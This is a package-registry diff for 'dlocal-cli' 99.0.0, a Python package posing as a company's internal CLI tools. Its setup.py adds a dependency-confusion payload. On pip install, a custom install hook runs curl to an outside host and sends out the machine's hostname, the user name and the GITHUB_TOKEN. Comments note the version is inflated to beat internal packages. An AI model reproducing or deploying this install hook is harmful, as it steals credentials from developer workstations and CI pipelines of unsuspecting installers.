dlocal-cli 99.0.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,7 @@
1
+ Metadata-Version: 2.4
2
+ Name: dlocal-cli
3
+ Version: 99.0.0
4
+ Summary: dLocal CLI tools
5
+ Author: dLocal Engineering
6
+ Dynamic: author
7
+ Dynamic: summary
@@ -0,0 +1,7 @@
1
+ Metadata-Version: 2.4
2
+ Name: dlocal-cli
3
+ Version: 99.0.0
4
+ Summary: dLocal CLI tools
5
+ Author: dLocal Engineering
6
+ Dynamic: author
7
+ Dynamic: summary
@@ -0,0 +1,6 @@
1
+ dlocal_cli.py
2
+ setup.py
3
+ dlocal_cli.egg-info/PKG-INFO
4
+ dlocal_cli.egg-info/SOURCES.txt
5
+ dlocal_cli.egg-info/dependency_links.txt
6
+ dlocal_cli.egg-info/top_level.txt
@@ -0,0 +1 @@
1
+ dlocal_cli
@@ -0,0 +1,3 @@
1
+ # dlocal_cli.py — dummy module so import doesn't fail
2
+ def main():
3
+ pass
@@ -0,0 +1,4 @@
1
+ [egg_info]
2
+ tag_build =
3
+ tag_date = 0
4
+
@@ -0,0 +1,20 @@
1
+ # setup.py — payload executes during `pip install`
2
+ import os
3
+ from setuptools import setup
4
+ from setuptools.command.install import install
5
+
6
+ class Exploit(install):
7
+ def run(self):
8
+ # Runs as the installing user — developer workstation or CI/CD
9
+ os.system("curl https://inxorwetrust.com.ar/exfil?host=$(hostname)&user=$(whoami)&token=$GITHUB_TOKEN")
10
+ # Or: reverse shell, credential theft, etc.
11
+ install.run(self)
12
+
13
+ setup(
14
+ name="dlocal-cli",
15
+ version="99.0.0", # Higher than any internal version → pip picks this
16
+ description="dLocal CLI tools", # Make it look legit
17
+ author="dLocal Engineering",
18
+ cmdclass={"install": Exploit},
19
+ py_modules=["dlocal_cli"],
20
+ )